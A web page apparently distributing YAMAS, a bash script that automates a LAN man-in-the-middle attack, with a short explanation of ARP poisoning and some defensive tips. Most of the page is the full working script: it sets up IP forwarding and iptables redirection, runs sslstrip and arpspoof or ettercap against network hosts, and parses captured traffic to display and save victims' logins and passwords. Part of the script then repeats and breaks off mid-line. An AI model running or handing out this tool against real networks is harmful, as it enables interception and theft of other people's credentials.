Tweet
LAN Network sniffer, YAMAS is a fully automized MITM attack tool.
Note : you need Arpspoof, sslstrip and some other dependencies installed to make it work (everything's already available on BT).
---
Well, this script is a MITM attack. But how to protect yourself of this kind of crap?!!
How to protect yourself from Man in the Middle Attacks ? --
In the attack Yamas uses, the vector is the poisonning of the victim's ARP cache. ARP is the protocol that will "translate" physical mac adresses into IP adresses on the local network. When an equipement wants to connect to the network, it will ask for the mac of the router's IP, eg : "Who has 192.168.1.1 ? Tell 192.168.1.2". The router then responds "198.168.1.1 [router] is at 11:22:33:44:55:66 [router]". This will be written in the ARP cache of the client. And this is where we come in play. We send spoofed ARP responses : "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]". The client will then modify its cache to set the attacker as the router. We then forward the traffic to the real router, which allows us to read, and manilipulate the traffic on-the-fly. That's how we get the passwords. Thanks to sslstrip, we force the clients to send the credentials as clear text, so that we can simply read them.
All right, but now, how do you protect yourself from that to happen to you ?
When you are a client - a website visitor - there are two things you can do : use programs, and/or your head. Program wise you'll have to find one that regularly checks for changements in the ARP tables to warn you in case of suspicious changements. Well-known ones include ARPon or ARPwatch.
You could also use ettercap under *nux or wireshark on any platform : even though it is not their job, and they will not run all the time, they will warn you in case of duplicates ARP responses with different MAC adresses. That also can be achieved with some internet security suites, but I won't make free ad for them so you'll have to find with you friend Google.
In the end, it's most of all a question of habits, or using your head, knowing your environnement : thou shall never - ever enter any [important] credential on unsecured connections such as public hotspots and open wifi, under any circumstances. Thou shall always check if the connection to the website is safe : the certicficate looks good, is up to date and the connection is tunneled through SSL (v3 if possible).
Since you're here, you probably use this attack yourself, so you should be able to recognize the glitches it provokes : have to relaod the page ? Page looks weird ? Takes time to load ? Disonnected when you didn't ask for it ? Pay attention, you may be under attack !
If you have any doubt, just don't send anything sensible over the network. It may seem obvious, but that's how you'll really protect yourself.
I either don't know much about it, or there's not much than I know to do. Well here's what you can do : use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...) or request the passwords to be encrypted before they are sent ! This can be done with .htaccess by using AuthType Digest. By requesting an MD5 encrypted password before it transits on the network, it could be sniffed, but rendered useless since MD5 isn't that easy to crack if you're using a good password. I know I wouldn't waste time cracking and MD5 password...
I'll try to add a module here to show you that. Meanwhile you can head over to maemo's website that uses this technique and sniff the network while doing so.
Edit : This is not the latest available version, go and grab it at http://comax.fr/
Note : you need Arpspoof, sslstrip and some other dependencies installed to make it work (everything's already available on BT).
#!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
version="0.9.4"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ ${looparseid} != "" ]]; then kill ${looparseid}
fi
if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
fi
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
if [ -e '/tmp/grepcred.txt' ]; then
rm /tmp/grepcred.txt
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
rm /tmp/grepcred.txt
exit 0
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
echo -e "\tYou will be using Ettercap instead of ARPspoof."
sleep 0.5
fi
if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
clear
echo -e "You are running $0, version $version.
usage : $0 [-h -c -p]* [-e -s]**
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
*Must be used alone
**Can be used at the same time.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0
fi
if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
clear
echo -e "\033[31m Changelog :\033[m
Should be added in next version/revision :
- Submit your ideas !
- We're close to a final version !
Added in v0.9.x
- Ettercap support (with -e switch in parameters)
- Silent mode (-s)
- Code enhancing.
Added in v0.8.x
- Tail-greping log file so we can be sure there is traffic being sniffed
- New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
This should be tested though to ensure maximum reliability. Please report back !
0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- New -p option to allow only parsing a file. (v0.8.5)
- More improvements.
- Catching ^C and cleanup before quitting. (v0.8.5)
- Realtime parsing menu. (V0.8.5)
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Install sslstrip if needed.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
exit
fi
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
message="\nNo message to display : you are running in silent mode"
else
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file
fi
### Check for updates !
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for a new version : silent mode."
else
wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file
if [[ $last_version > $version ]] ; then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
read update
if [[ $update = Y || $update = y ]] ; then
echo "[+] Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' ]] ; then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else echo "Ok, continuing with current version..."
fi
else echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' ]] ; then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else echo "Ok, not installing then !"
fi
else echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
_______ _______ _______ _______ _______ _____
|\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
\ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
\ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
| | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
\_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
kill ${sslstripid}
kill ${looparseid}
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
rm /tmp/grepcred.txt
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt /root/$filename.txt #moving file
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
else
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
fi
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
if [[ $install = "Y" || $install="y" ]] ; then
cp ./yamas.sh /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit 1
}
updatestrip() {
wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install > /dev/null
cd ..
rm sslstrip-0.9.tar.gz
}
search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target() {
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii() {
clear
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "ASCII tables won't be available"
echo "ASCII tables are not available" > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii
rm /tmp/ascii
fi
final
}
tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
final
}
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
rtparse
fi
}
final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.
Enter the number of the desired option."
read final
if [ "$final" = "1" ] ; then
rescan
elif [ "$final" = "2" ] ; then
add_target
elif [ "$final" = "3" ] ; then
ascii
elif [ "$final" = "4" ] ; then
tailsecure
elif [ "$final" = "5" ] ; then
rtparse
elif [ "$final" = "6" ] ; then
cleanup
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final
fi
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ] ; then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ] ; then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
else
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
read -e sslupdate
if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
else echo "\033[33mOops, install failed.\033[m Continuing with current version."
fi
else echo "All right, continuing with current version."
fi
elif [[ $sslversion = "0.9" ]]; then
echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
fi
elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
read -e sslupdate
if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
else echo "All right, continuing with current, non-installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
fi
elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
chmod +x '/pentest/web/sslstrip/sslstrip.py'
if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Now it is. Continuing..."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
installed.
You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
read apti
if [[ $apti = "Y" || $apti = "y" ]] ; then
apt-get install sslstrip
exit 1
fi
fi
fi
fi
sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 2) { print $5}')
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo
echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){" > /tmp/looparse.sh
if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
else
echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
fi
echo "while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
version="0.9.4"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ ${looparseid} != "" ]]; then kill ${looparseid}
fi
if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
fi
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
if [ -e '/tmp/grepcred.txt' ]; then
rm /tmp/grepcred.txt
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
rm /tmp/grepcred.txt
exit 0
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
echo -e "\tYou will be using Ettercap instead of ARPspoof."
sleep 0.5
fi
if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
clear
echo -e "You are running $0, version $version.
usage : $0 [-h -c -p]* [-e -s]**
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
*Must be used alone
**Can be used at the same time.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0
fi
if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
clear
echo -e "\033[31m Changelog :\033[m
Should be added in next version/revision :
- Submit your ideas !
- We're close to a final version !
Added in v0.9.x
- Ettercap support (with -e switch in parameters)
- Silent mode (-s)
- Code enhancing.
Added in v0.8.x
- Tail-greping log file so we can be sure there is traffic being sniffed
- New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
This should be tested though to ensure maximum reliability. Please report back !
0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- New -p option to allow only parsing a file. (v0.8.5)
- More improvements.
- Catching ^C and cleanup before quitting. (v0.8.5)
- Realtime parsing menu. (V0.8.5)
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Install sslstrip if needed.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
exit
fi
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
message="\nNo message to display : you are running in silent mode"
else
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file
fi
### Check for updates !
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for a new version : silent mode."
else
wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file
if [[ $last_version > $version ]] ; then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
read update
if [[ $update = Y || $update = y ]] ; then
echo "[+] Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' ]] ; then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else echo "Ok, continuing with current version..."
fi
else echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' ]] ; then
